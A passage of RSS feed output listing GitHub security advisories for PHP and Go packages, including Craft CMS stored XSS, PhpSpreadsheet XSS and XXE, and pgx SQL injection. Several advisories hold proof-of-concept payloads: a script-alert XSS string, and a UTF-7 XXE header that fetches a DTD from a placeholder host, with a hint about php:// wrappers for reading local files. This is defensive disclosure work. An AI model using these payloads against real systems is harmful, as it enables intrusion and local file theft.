<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[craftcms/cms] Craft CMS vulnerable to stored XSS in breadcrumb list and title fields</title>
<description><h3 id="summary">Summary</h3>
<p>Multiple Stored XSS can be triggered by the breadcrumb list and title fields with user input.</p>
<h3 id="details">Details</h3>
<ol>
<li>In the <strong>/admin/categories</strong> page, category title isn't sanitized and triggered xss.</li>
<li>In the category edit page under the <strong>/admin/categories/</strong>, category title in breadcrumb list isn't sanitized and triggered xss.</li>
<li>In the <strong>/admin/entries</strong> page, entry title isn't sanitized and triggered xss.</li>
<li>In the entry edit page under the <strong>/admin/entries/</strong>, entry title in breadcrumb list isn't sanitized and triggered xss.</li>
<li>In the <strong>/admin/myaccount</strong> and pages under it, username or full name in breadcrumb list isn't sanitized and triggered xss.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Malicious users can tamper with the control panel.</p>
<h3 id="poc">PoC</h3>
<h4 id="1-in-the-admincategories-page-category-title-isnt-sanitized-and-triggered-xss">1. In the <strong>/admin/categories</strong> page, category title isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Categories ( /admin/settings/categories )
2. Create new category group
3. Access to the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access to the Categories page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/4e0f35c7-fbb0-4d38-a0b5-9e28750ff706" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e046b9db-d83c-4f81-ad91-165c5afedeb9" referrerpolicy="no-referrer"></p>
<h4 id="2-in-the-category-edit-page-under-the-admincategories-category-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">2. In the category edit page under the <strong>/admin/categories/</strong>, category title in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Categories ( /admin/settings/categories )
2. Create new category group
3. Access to the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access to the Category edit page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f7543a11-58eb-4099-9ee2-3461816c52ea" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f01bbb80-4417-42ca-bf51-b38860f6c74a" referrerpolicy="no-referrer"></p>
<h4 id="3-in-the-adminentries-page-entry-title-isnt-sanitized-and-triggered-xss">3. In the <strong>/admin/entries</strong> page, entry title isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create new entry type
3. Access to the Settings -&gt; Sections ( /admin/settings/sections )
4. Create new section
5. Access to the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access to the Entries page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b255a999-e48c-46be-b732-4482ea9cee9a" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/445d8e0c-71b6-49c7-8f4a-37541dcc9c85" referrerpolicy="no-referrer"></p>
<h4 id="4-in-the-entry-edit-page-under-the-adminentries-entry-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">4. In the entry edit page under the <strong>/admin/entries/</strong>, entry title in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create new entry type
3. Access to the Settings -&gt; Sections ( /admin/settings/sections )
4. Create new section
5. Access to the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access to the Entriy edit page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a59a122b-b9e7-4695-be13-eb8a1c2d36df" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b0d27446-7ac6-47e7-ac02-20c924698b13" referrerpolicy="no-referrer"></p>
<h4 id="5-in-the-adminmyaccount-and-pages-under-it-username-or-full-name-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">5. In the <strong>/admin/myaccount</strong> and pages under it, username or full name in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the My Account Page ( /admin/myaccount )
2. Input the Full Name column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
3. Push the the Save button
4. Access to the My Account page ( /admin/myaccount ) or pages under it ( /admin/myaccount/addresses , /admin/myaccount/preferences , etc.) and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/3be45bdd-0757-42a8-bc5d-320ab2339fd0" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e1be7446-1c54-42bc-af9a-a8ac81a2d7bf" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/5fa06b26-fecd-40f5-bc8b-171f881f8a2a" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42">https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42</a></li>
<li><a href="https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8">https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45406">https://nvd.nist.gov/vuln/detail/CVE-2024-45406</a></li>
<li><a href="https://github.com/advisories/GHSA-28h4-788g-rh42">https://github.com/advisories/GHSA-28h4-788g-rh42</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-28h4-788g-rh42</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-28h4-788g-rh42</guid>
<author>GitHub</author>
</item>
<item>
<title>[nategood/httpful] Httpful is Missing Certificate Validation</title>
<description><p>Httpful has Insecure HTTPS Connections due to Missing Default Certificate Validation</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/nategood/httpful/issues/247">https://github.com/nategood/httpful/issues/247</a></li>
<li><a href="https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84">https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84</a></li>
<li><a href="https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml">https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml</a></li>
<li><a href="https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35">https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35</a></li>
<li><a href="https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb">https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb</a></li>
<li><a href="https://github.com/advisories/GHSA-gcfg-hmwx-wq5h">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</guid>
<author>GitHub</author>
</item>
<item>
<title>[twbs/bootstrap] Bootstrap Cross-Site Scripting (XSS) vulnerability</title>
<description><p>A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an <a> tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser.</a></p><a>
<h3 id="references">References</h3>
</a><ul><a>
</a><li><a></a><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-6531">https://nvd.nist.gov/vuln/detail/CVE-2024-6531</a></li>
<li><a href="https://www.herodevs.com/vulnerability-directory/cve-2024-6531">https://www.herodevs.com/vulnerability-directory/cve-2024-6531</a></li>
<li><a href="https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml">https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml</a></li>
<li><a href="https://github.com/advisories/GHSA-vc8w-jr9v-vj7f">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</guid>
<author>GitHub</author>
</item>
<item>
<title>[reportico-web/reportico] SQL Injection vulnerability in Reportico Till</title>
<description><p>SQL Injection vulnerability in Reportico Till 8.1.0 allows attackers to obtain sensitive information or other system information via the project parameter.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-47438">https://nvd.nist.gov/vuln/detail/CVE-2023-47438</a></li>
<li><a href="https://github.com/reportico-web/reportico/issues/52">https://github.com/reportico-web/reportico/issues/52</a></li>
<li><a href="https://github.com/advisories/GHSA-jjf4-959w-f545">https://github.com/advisories/GHSA-jjf4-959w-f545</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jjf4-959w-f545</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jjf4-959w-f545</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Open index.php in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Open index.php in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
</channel>
</rss>... |
http://localhost:1200/github-advisor/data/go - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - go</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/go" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - go - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:19:16 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[github.com/jackc/pgproto3/v2] pgproto3 SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v2.3.3</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-27304">https://nvd.nist.gov/vuln/detail/CVE-2024-27304</a></li>
<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v5] pgx SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2 and v5.5.4.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-mrww-27vc-gghv">https://github.com/advisories/GHSA-mrww-27vc-gghv</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mrww-27vc-gghv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mrww-27vc-gghv</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v4] pgx SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2 and v5.5.4.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
